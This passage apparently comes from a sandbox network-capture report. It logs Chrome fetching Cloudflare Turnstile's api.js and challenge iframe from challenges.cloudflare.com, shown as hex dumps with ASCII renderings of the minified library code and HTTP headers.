                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                              Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                              Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Ie;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 49 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c
                                                                              Data Ascii: OM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function it(e){return M(["auto","dark","light"],e)}function ot(e){return M(["auto","never"],e)}function ct(e){return e>0&&e<9e5}function ut(e){return e>0&&e<36e4}var Ir=/^[0-9A-Za-z_-]{3,
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 68 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 6b
                                                                              Data Ascii: ,er=".g-recaptcha",ht="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],k
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d
                                                                              Data Ascii: boseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function Be(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74
                                                                              Data Ascii: 0;return qe=function(o){if(o===null||!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Se(o,arguments,ce(t
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6e 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29
                                                                              Data Ascii: uld not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async||e.defer)&&(n.loadedAsync=!0);var o=r.split("?");return o.length>1&&(n.params=new URLSearchParams(o[1]))
                                                                              2025-01-10 20:41:43 UTC1369INData Raw: 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 53 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 53 2e 69 64 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 66 72 22 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 68 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22
                                                                              Data Ascii: yle.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.overflow="hidden",E.style.margin="0px auto";var S=document.createElement("iframe");S.id="".concat(e,"-fr"),S.setAttribute("src",h),S.setAttribute("allow"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.549744104.18.94.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:43 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:44 UTC471INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:44 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47521
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d523b1a8c21-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:44 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                              Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                              Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                              Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                              Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                              Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                              Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                              Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.549743104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:43 UTC792OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
